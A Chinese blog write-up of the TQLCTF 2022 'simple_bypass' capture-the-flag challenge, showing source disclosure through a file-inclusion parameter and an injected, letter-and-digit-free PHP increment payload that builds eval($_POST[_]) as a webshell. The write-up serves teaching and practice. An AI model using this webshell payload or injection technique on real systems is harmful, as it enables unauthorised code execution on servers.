[TQLCTF 2022]simple_bypass

最新推荐文章于 2024-08-26 10:17:18 发布
最新推荐文章于 2024-08-26 10:17:18 发布
阅读量587 收藏
点赞数 1
分类专栏: 刷题记录 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73512445/article/details/132725797
版权

文章目录

涉及知识点

  1. 无数字字母RCE
  2. 自增马构造
  3. 文件包含读取源码

解题过程

打开题目,随便注册一个用户为admin
登陆进去后,一眼发现杰哥图片有线索
在这里插入图片描述我们F12看一下如何请求的
在这里发现可能存在文件包含漏洞

在这里插入图片描述我们尝试读取下源码

./get_pic.php?image=index.php

然后base64解码一下,直接看核心部分

<?php
error_reporting(0);
if(isset($_POST['user']) && isset($_POST['pass'])){
	$hash_user = md5($_POST['user']);
	$hash_pass = 'zsf'.md5($_POST['pass']);
	if(isset($_POST['punctuation'])){
		//filter
		if (strlen($_POST['user']) > 6){
			echo("<script>alert('Username is too long!');</script>");
		}
		elseif(strlen($_POST['website']) > 25){
			echo("<script>alert('Website is too long!');</script>");
		}
		elseif(strlen($_POST['punctuation']) > 1000){
			echo("<script>alert('Punctuation is too long!');</script>");
		}
		else{
			if(preg_match('/[^\w\/\(\)\*<>]/', $_POST['user']) === 0){
				if (preg_match('/[^\w\/\*:\.\;\(\)\n<>]/', $_POST['website']) === 0){
					$_POST['punctuation'] = preg_replace("/[a-z,A-Z,0-9>\?]/","",$_POST['punctuation']);
					$template = file_get_contents('./template.html');
					$content = str_replace("__USER__", $_POST['user'], $template);
					$content = str_replace("__PASS__", $hash_pass, $content);
					$content = str_replace("__WEBSITE__", $_POST['website'], $content);
					$content = str_replace("__PUNC__", $_POST['punctuation'], $content);
					file_put_contents('sandbox/'.$hash_user.'.php', $content);
					echo("<script>alert('Successed!');</script>");
				}
				else{
					echo("<script>alert('Invalid chars in website!');</script>");
				}
			}
			else{
				echo("<script>alert('Invalid chars in username!');</script>");
			}
		}
	}
	else{
		setcookie("user", $_POST['user'], time()+3600);
		setcookie("pass", $hash_pass, time()+3600);
		Header("Location:sandbox/$hash_user.php");
	}
}
?>

在这里可以看到user,website都做了严格的过滤并且限制输入长度
但是观察到strlen($_POST['punctuation']) > 1000,猜测这是利用的突破口
观察到是无字母数字RCE,那么大概思路就是自增构造

我们再读取一下源码中的./template.html
解码完发现很长,这里只展示有用的部分

<div id="start_block"> <a title="开始" id="start_btn"></a>
    <div id="start_item">
      <ul class="item admin">
        <li><span class="adminImg"></span>
		<?php
			error_reporting(0);
			$user = ((string)__USER__);
			$pass = ((string)__PASS__);
			
			if(isset($_COOKIE['user']) && isset($_COOKIE['pass']) && $_COOKIE['user'] === $user && $_COOKIE['pass'] === $pass){
				echo($_COOKIE['user']);`
			}
			else{
				die("<script>alert('Permission denied!');</script>");
			}
		?>
		</li>
      </ul>
      <ul class="item">
        <li><span class="sitting_btn"></span>系统设置</li>
        <li><span class="help_btn"></span>使用指南 <b></b></li>
        <li><span class="about_btn"></span>关于我们</li>
        <li><span class="logout_btn"></span>退出系统</li>
      </ul>
    </div>
  </div>
</div>
<a href="#" class="powered_by">__PUNC__</a>

分析一下,(string)__USER__会将__USER__强转成string类型。
然后利用点已经知道是无数字字母RCE,<?php被禁了,那么只能利用代码前面自带的<?php去shell
我们选择可以利用注释符注释,然后用);闭合回去,__PUNC__写exp再把下面的注释掉。
具体执行如下

在这里插入图片描述__PUNC__的exp

$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);

所以我们注册

//注册页面
user:a/*
passwd:a
website:a
punctuation:*/);$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);/*
 
//这个自增代表的是eval(@_POST[_]);

注册成功后,命令执行一下
在这里插入图片描述回显在页面源代码最下面找到(报错无关紧要)

在这里插入图片描述得到flag

在这里插入图片描述

_rev1ve
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
simple_bypass
m0_60716947的博客
10-27 851
很像无字母数字rce,先看看后面的,获取了template.html的页面内容,并进行了一些替换,我们再去看看template.html的代码。审计代码(还好简单,不然我这个菜鸡就寄了),几个post传参,并对长度进行了限制,然后正则匹配过滤。使用半个注释符进行闭合,然后构造恶意代码,再在最后使用半个多行注释符把后面注释掉就可以了。开靶机,发现一个登录与注册的页面,尝试sql注入,无果,随便注册一个登录上去。主要是这里,但是index.php对他的长度进行了限制,所以不能在这里构造。
NSSCTF web题记录
热门推荐
m0_64815693的博客
11-08 1万+
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生赛]babyunser [TQLCTF 2022]simple_bypass
TQLCTF2022真题
02-22
TQLCTF2022真题
mtk机型修复nv 授权 解包MTK_Auth_Bypass_Tool_V25+24双版合一
01-22
外网软件 mtk线刷授权 mtk机型解锁 super解包等 自带图文翻译与操作动画 解密bbs.ydss.cn
大华的java笔试题-dahua_dvr_auth_bypass:大华CCTVDVR认证绕过Metasploit扫描模块
06-20
大华的java笔试题dahua_dvr_auth_bypass 大华CCTV DVR认证绕过Metasploit扫描模块 这是一个 Metasploit 模块,用于扫描和利用大华和大华更名的 CCTV DVR。 安装: git 克隆 将 dahua_dvr_auth_bypass.rb 文件复制到 ...
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
标题 "hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip" 指向的是一个与海康威视(Hikvision)设备相关的安全漏洞,具体是CVE-2017-7921认证绕过漏洞。这个压缩包可能包含一个工具或指南,用于解析...
nac_bypass:脚本收集以绕过网络访问控制(NAC,802.1x)
01-31
标题中的“nac_bypass”指的是一个专门针对网络访问控制(NAC,Network Access Control)进行规避的技术集合,尤其关注802.1x标准。802.1x是一种基于端口的网络访问控制协议,常用于企业环境中,通过认证用户设备的...
bypass_bypass_
09-29
適用於近期之xccode之過渡偵測方式之檔案
[TQLCTF2022] Simple PHP WP
A10ng_的博客
02-21 720
这个题很有意思,写shell的姿势比较好玩,我在之前搞渗透的时候同样遇到类似手法, 所以就记录一下。 打开题目是一个登录口,个人习惯,先测一下注入,发现是不存在的,然后注册一个号上去康康,这一康不得了,发现了有个功能点有任意文件读取,他是去加载本地文件的一个功能。并且文件的路径和文件名可控,在测试了/etc/passwd,成功读取了。 然后在fuzz了一下flag文件名没有结果后,继续尝试下一步,把所有的源码读出来,我首先读了这个功能点的源码。发现是用的file_get_contents函数,所以并不存在
2022 TQLCTF nemu
weixin_46483787的博客
03-02 1346
nemu是一个南京大学的调试器项目,想了解更多可以去github上看看: https://github.com/NJU-ProjectN/nemu 我们首先把程序运行起来看看: 通过help可以看到程序实际上是实现了一个简单的debugger功能,里面内置了一段简短的汇编代码,那么接下来我们将目光放到help中出现的这几个函数上即可 这里直接给出结论,x指令在读的时候没有检查地址,从而导致了越界读,set存在一个越界写,而本题got表可改,且没开PIE 先来分析一下程序运行过程: 首先是读入命令,根据读入
TQLCTF-Simple PHP
qq_53460654的博客
02-21 723
注册登录,抓包发现有个地方有任意文件读取 读取index.php 关键代码 if(preg_match('/[^\w\/\(\)\*<>]/', $_POST['user']) === 0){ if (preg_match('/[^\w\/\*:\.\;\(\)\n<>]/', $_POST['website']) === 0){ $_POST['punctuation'] = preg_replace("/[a-z,A-Z,0- 9>\?]/","",$_POST['pun
TQLCTF2022 WriteUP(自己做+收集整理+持续更新)
Laffrey的专栏
02-22 1498
[Misc]1.签到 关注微信公众号后,获得1个链接,在源码中找到flag。 [Misc]2. Wizard 访问链接,打开web页面显示的内容如下: SHA256('TQLCTF' + ?) starts with 58011 Please input the string: 于是,猜测这题需要通过命令行(CLI)界面进行交互。 题目是对字符串 'TQLCTF' + ? 进行SHA256哈希计算,得到的哈希值以 58011 开头。 显然,我们需要根据server端发来的回显信息,提取到哈希值(58011
[TQLCTF_2022]web复现
qq_46263951的博客
03-23 690
注册登陆,查看图片 使用伪协议我们可以读取到/etc/passwd 想要读取get_pic.php和index.php但是不知道文件路径,所以使用php伪协议 /get_pic.php?image=php://filter/convert.base64-encode/resource=get_pic.php | index.php get_pic.php源码 <?php error_reporting(0); $image = (string)$_GET['image']; ech.
Kubernetes(k8s)中部署WordPress
ljj19910401的博客
08-21 177
在Kubernetes(k8s)中部署WordPress通常涉及创建一个Deployment来管理WordPress的Pod,以及一个Service来暴露WordPress应用。此外,由于WordPress需要数据库支持,你还需要部署一个MySQL或MariaDB的Pod和Service。注意:这里Service的类型设置为LoadBalancer,这适用于大多数云环境(如AWS, GCP, Azure等),它们会自动为你创建一个负载均衡器。首先,我们创建MySQL的Deployment和Service。
推荐一个完全自由的目录设计网站
qq_30049249的博客
08-22 526
因此,如果想在网站上写一本自己的书,我们需要一个目录设计的工具。现在,我们点击全部,看到自己的所有文章。这样,先创建各级栏目,再将文章拖动到各级栏目,就实现了对文章到整理。上面的链接提供参考,这里主要介绍其中的目录设计工具,也叫栏目设计。好,现在我们来出一本书,想一个名字,就叫《学习PHP动态网站开发》如果我们能通过网站出一本书,这将是一件很酷的事。事实上,我们通过网站发布知识,最常见的是写博客。先点击所有,查看子栏目和文章,然后进行拖动排序。好,本文说的是完全自由的目录设计,有多自由呢?
upload-labs(Pass-18 ~ Pass-21)
m0_64849639的博客
08-23 489
所以我们只要上传的文件后缀不是白名单中的,该文件就还是会被删除2、思路:由于该文件后缀不是白名单中的,该文件就还是会被删除;但是,服务器删除该php文件是有一定的延迟的,若我们在这延迟中访问了该php代码,那么就会在当前目录生成shell.php文件3、实践:(1)、抓包进入爆破模块:(2)发包:此时就在源源不断的上传文件1.php,服务器也在一直删除该文件;
畅捷通CRM newleadset.php SQL注入漏洞复现
最新发布
0xSec
08-26 246
用友畅捷CRM newleadset.php 处存在SQL注入漏洞 ,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
mtk_bypass中文版
05-14
mtk_bypass中文版是一款由国内开发者制作的MTK芯片解锁工具。这个工具能够在不需要输入账户密码的情况下解锁MTK芯片的手机或平板电脑。用户可以在手机出现账户锁或屏幕锁时使用该工具进行解锁,同时能够快速刷机、重置密码等操作。 mtk_bypass中文版的使用方法相对简单,只需要将无需解锁的SIM卡插入手机,然后将手机与电脑连接,运行mtk_bypass工具,按照界面提示即可完成解锁和其他操作。这个工具支持多种机型和系统版本,应用范围较广。 然而,需要注意的是,使用这个工具进行解锁可能会违反手机的服务协议,甚至可能会导致手机出现安全问题。因此,如果使用该工具解锁MTK芯片的手机或平板电脑,应该仅限于个人使用,谨防进行非法或者侵权操作。同时,在使用过程中务必事先备份好系统和数据,以免出现潜在的数据丢失风险。 总之,mtk_bypass中文版是一个方便实用的MTK芯片解锁工具,但使用时需要谨慎,遵守法律法规,避免造成不必要的麻烦和损失。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_rev1ve

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值